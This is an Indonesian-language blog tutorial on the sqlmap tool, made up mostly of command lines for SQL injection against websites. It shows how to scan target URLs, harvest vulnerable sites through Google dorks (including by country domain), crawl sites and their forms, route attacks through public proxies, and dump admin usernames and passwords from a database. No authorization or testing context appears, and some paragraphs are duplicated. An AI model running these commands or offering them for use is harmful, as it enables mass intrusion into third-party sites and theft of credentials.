SQLMAP TUTORIAL
Kali ini saya akan memberikan sebuah tutorial tentang software/aplikasi yang mendukung software python. SQLMAP adalah aplikasi yang dapat memetakan sebuah DB dari web vuln. Langsung saja kita mulai.
# Start SQLMap
C:python/sqlmap/sqlmap.py –hh <<(perintah ini digunakan untuk melihat perintah apa saja yang adad di SQLMAP
Saya asumsikan kalian sudah mengetahui target yang ada.
1. Command option -u
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch –dbs
Perintah yang di atas akan melakukan serangan berbasis Sebagai alternatif pada BEUSTQ (Boolean, Error, Union, Stacked, Query, Time), dari serangan normal.
Untuk memfokuskan serangan dengan teknik serangan spesifik, Anda dapat mengaturnya di perintahinjeksi, misalnya ketika Anda melakukan injeksi petunjuk untuk target ini dengan melakukan sesuatuseperti ini :
http://www.domain.com/article.php?id=7'http://www.domain.com/article.php?id=7 and 1=0
dan Anda melihat ada pesan error SQL pada halaman, maka Anda mungkin ingin mengatur teknikserangan dengan opsi: –tech=E
Sebaliknya, jika Anda tidak melihat apa-apa, tetapi Anda cukup yakin bahwa ada sebuah titik injeksipada halaman tersebut atau hanya ingin menguji injeksi.
2. Command option -g (crawl potential targets from Google results)
Dengan pilihan -g, kita bisa menjelajah setiap target potensial dari hasil Google berdasarkan dork diinput.
C:python/sqlmap/sqlmap.py -g "intext:article.php?id=" --random-agent --level 2 --risk 2 --threads 5 --batch –dbs
Untuk menjelajah dari situs tertentu berdasarkan di mana domain negara terdaftar, misalnya: .com.sg
C:python/sqlmap /sqlmap.py -g "intext:article.php?id= + site:.com.sg" --random-agent --level 2 --risk 2 --threads 5 --batch –dbs
Tentu, Anda dapat menggunakan Dorks Google lainnya seperti yang Anda inginkan.
Jika Anda tidak melihat serangan sedang diproses, itu berarti tidak ada titik injeksi potensial yang dapat disisipkan. Potensi titik injeksi link URL harus mengandung setidaknya satu parameter GET, misalnya:?? Php id =, Asp pid =, dll ..
Jika Anda tidak melihat serangan sedang diproses, itu berarti tidak ada titik injeksi potensial yang dapat disisipkan. Potensi titik injeksi link URL harus mengandung setidaknya satu parameter GET, misalnya:?? Php id =, Asp pid =, dll ..
3. Command option –crawl
Injection command:C:python/sqlmap /sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --dbs
Perintah yang di atas akan menjelajah setiap link yang ditemukan di situs web tertentu dan akan menyuntikkan Link yang memiliki GET parameter di dalamnya.
*crawl: menjelajah melalui setiap link di halaman situs. Kami menggunakan -crawl = 3 berarti akan menjelajah secara mendalam sampai kedalaman "3" halaman.
http://www.domain.com, mempunyai link/menu/page “articles”.
Depth 1: http://www.domain.com/articles
Depth 2: http://www.domain.com/articles/newest/
Depth 3: http://www.domain.com/articles/newest/funny-topics/
Depth 4: http://www.domain.com/articles/newest/funny-topics/author/
Pilihan -crawl= 3 akan menjelajah setiap link yang ditemukan di kedalaman 1, 2, dan 3, tetapi tidak mendalam 4. Oke, saya harap Anda mengerti.
Anda bebas untuk mengatur kedalaman menjelajah seperti yang Anda inginkan. Tapi, ingat semakin Anda mengatur kedalaman menjelajah, semakin Anda akan mendapatkan banyak link untuk menyuntikkan (jika memiliki parameter GET).
Anda bebas untuk mengatur kedalaman menjelajah seperti yang Anda inginkan. Tapi, ingat semakin Anda mengatur kedalaman menjelajah, semakin Anda akan mendapatkan banyak link untuk menyuntikkan (jika memiliki parameter GET).
4. Command option –forms
Injection command:C:python/sqlmap /sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --forms –dbs
Perintah yang di atas akan mencoba untuk mencari bentuk POST di halaman situs. Sebagai contoh: di homepage akan ada beberapa bentuk seperti pencarian, form login, dll
Tapi, bagaimana jika bentuk POST berada di halaman lain secara mendalam, dalam website dan kita tidak tahu di mana itu? Kita bisa bergabung dengan perintah -crawl sebelumnya.
Contoh :Tapi, bagaimana jika bentuk POST berada di halaman lain secara mendalam, dalam website dan kita tidak tahu di mana itu? Kita bisa bergabung dengan perintah -crawl sebelumnya.
C:python/sqlmap /sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --forms –dbs
5. Command option –proxy
C:python/sqlmap /sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --proxy="https://123.123.123.123:3128" –dbs
Cari beberapa IP proxy yang bekerja dan port. Biasanya di web yg menyediakan proxy/sock5, sepertihttp://hidemyass.com/proxy-list
6. Command option –dbms
Misalkan kita cukup yakin bahwa situs target menggunakan tipe database MySQL. Kita bisamengaturnya di perintah dengan opsi -dbms = mysql, sehingga akan lebih cepat dalam serangan injeksi, daripada memutar melalui semua jenis database seperti Oracle, MSSQL, dll
Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbms=mysql –dbs
7. Command option -D, -T, -C
-D: dump database
-T: dump table
-C: dump column
Katakanlah kita punya nama database seperti: sitedb.
Injection command:C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb –T
Perintah yang di atas akan enumerasi semua nama tabel dari database "sitedb".
Katakanlah kita punya 15 tabel nama, salah satunya adalah: admin. Dan kita ingin menghitung namakolom tersebut.
Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin –C
Perintah yang di atas akan enumerasi semua nama kolom dari database "sitedb" dan tabel "admin".
Katakanlah kita punya 6 kolom nama, misalnya: id, admin_id, admin_pass, admin_fullname, admin_mail,admin_level.
Kami ingin membuang semua data dalam tabel "admin".
Injection command:
C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --dump
Atau jika Anda ingindumping hanya kolom tertentu, seperti "admin_id" dan "admin_pass"
Injection command:C:python/sqlmap/sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin_pass --dump
Itu hanya beberapa command/perintah yang digunakan pada SQLMAP. Jika kalian ingin berkembang, silahkan jelajahi di google dan BING
0 komentar:
Posting Komentar